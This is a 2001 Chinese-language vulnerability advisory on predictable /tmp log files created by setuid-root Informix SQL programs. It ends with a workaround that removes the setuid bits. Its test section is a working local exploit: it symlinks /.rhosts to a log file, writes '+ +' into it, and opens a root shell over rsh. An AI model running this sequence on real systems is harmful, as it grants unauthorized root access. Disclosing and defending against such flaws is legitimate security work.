发布日期：2001-09-04
更新日期：2001-09-11

受影响系统：

IBM Informix SQL 7.31.UC5
IBM Informix SQL 9.20 UC2
   - Sun Solaris 7.0
   - Sun Solaris 2.6
   - Slackware Linux 8.0
   - Slackware Linux 7.1
   - Slackware Linux 7.0
   - S.u.S.E. Linux 7.2
   - S.u.S.E. Linux 7.1x86
   - S.u.S.E. Linux 7.0
   - RedHat Linux 7.1 i386
   - RedHat Linux 7.0 i386
   - RedHat Linux 6.2E i386
   - RedHat Linux 6.2 i386
   - MandrakeSoft Linux Mandrake 8.0
   - MandrakeSoft Linux Mandrake 7.2
   - MandrakeSoft Linux Mandrake 7.1
   - MandrakeSoft Linux Mandrake 7.0
   - Debian Linux 2.2
   - Conectiva Linux 7.0
   - Conectiva Linux 6.0
   - Conectiva Linux graficas
   - Conectiva Linux ecommerce

描述：

---

BUGTRAQ ID: 3287

Informix是由IBM发布和维护的企业级数据库产品。

发现Informix SQL附加软件包中的多个程序在“/tmp”目录下创建日志文件时，文件名可预知，
而且在创建文件之前没有检查该文件是否存在或者是否为普通文件，又因为这些程序有setuid位，
导致攻击者可能利用这个漏洞覆盖任何系统文件，提升权限或者是进行拒绝服务攻击。
可能存在问题的程序有：
onbar_d ondblog onsmsync onsrvapd snmpdm

<*来源：（s96192@ce.hannam.ac.kr）
  链接： http://archives.neohapsis.com/archives/bugtraq/2001-08/0463.html
*>

测试方法：

---

警 告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

（s96192@ce.hannam.ac.kr）提供了如下测试代码：

第一部分：
$ id
uid=500 (informix) gid=120 (informix) groups=1000(loveyou)
$ umask 0000
$ cd ~informix/bin (Informix HOME Directory)
$ ./onshowaudit
INFORMIX-SQL Version 7.31.UC5
$ ls -al onbar_d ondblog onsmsync onsrvapd
-rwsr-sr-x   1 root     informix 2234104 Nov 18  1999 onbar_d
-rwsr-sr-x   1 root     informix 2219456 Nov 18  1999 ondblog
-rwsr-sr-x   1 root     informix 2284972 Apr 10  2000 onsmsync
-rwsr-sr-x   1 root     informix   39144 Nov 18  1999 onsrvapd

$ ./onbar_d   或 ./ondblog  或 ./onsmsync
$ ls -al /tmp/bar*
-rw-rw----   1 root     informix     557 Aug 29 17:26 /tmp/bar_act.log
-rw-rw----   1 root     informix       0 Aug 29 17:26 /tmp/bar_dbug.log


第二部分：
$ ./onsrvapd
$ ls -al /tmp/ons*
-rw-rw-rw-   1 root     informix     141 Aug 29 17:38 /tmp/onsnmp.(hostname).log
-rw-rw-rw-   1 informix informix     319 Aug 29 17:38 /tmp/onsrvapd.log


第三部分：
$ ./snmpdm
$ ls -al /tmp/snmpd.log
-rwxrwxrwx   1 root     root        1085 Aug 29 17:43 /tmp/snmpd.log


第四部分：
loveyou@dogfoot$ ln -s /.rhosts /tmp/onsbmp.dogfoot.log
loveyou@dogfoot$ ~informix/bin/onsrvapd &
loveyou@dogfoot$ ls -al /.rhosts
-rw-rw-rw-   1 root     informix     141 Aug 29 18:28 /.rhosts
loveyou@dogfoot$ echo "+ +" > /.rhosts
loveyou@dogfoot$ rsh -l root localhost csh -i
# whoami
root


建议：

---

临时解决方法：

我们建议你在安装升级补丁之前，临时去掉该程序的setuid位：

$ su -
# cd ~informix/bin (Informix 主目录)
# chmod o-s onbar_d ondblog onsmsync onsrvapd snmpdm


厂商补丁：

目前厂商还没有提供补丁或者升级程序，我们建议使用此软件的用户随时关注厂商
的主页以获取最新版本：
http://www.informix.com/

浏览次数：4198
严重程度：0（网友投票）